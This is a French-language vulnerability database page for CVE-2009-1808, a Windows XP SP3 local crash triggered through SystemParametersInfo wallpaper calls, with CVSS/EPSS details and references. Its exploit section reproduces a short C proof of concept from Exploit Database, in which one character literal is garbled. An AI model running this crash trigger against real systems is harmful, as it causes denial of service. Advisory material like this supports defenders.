CVE-2009-1808 : Détail

CVE-2009-1808

0.04%V3
Local
2009-05-28
18h14 +00:00
2017-08-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33012

Date de publication : 2009-02-01 23h00 +00:00
Auteur : Arkon
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/35120/info Microsoft Windows is prone to a local privilege-escalation vulnerability. Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. #include <windows.h> int main() { WCHAR c[1000] = {0}; memset(c, �c�, 1000); SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0); WCHAR b[1000] = {0}; SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0); return 0; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

    Références

    http://www.securityfocus.com/bid/35120
    Tags : vdb-entry, x_refsource_BID
    http://www.securitytracker.com/id?1022330
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/35323
    Tags : third-party-advisory, x_refsource_SECUNIA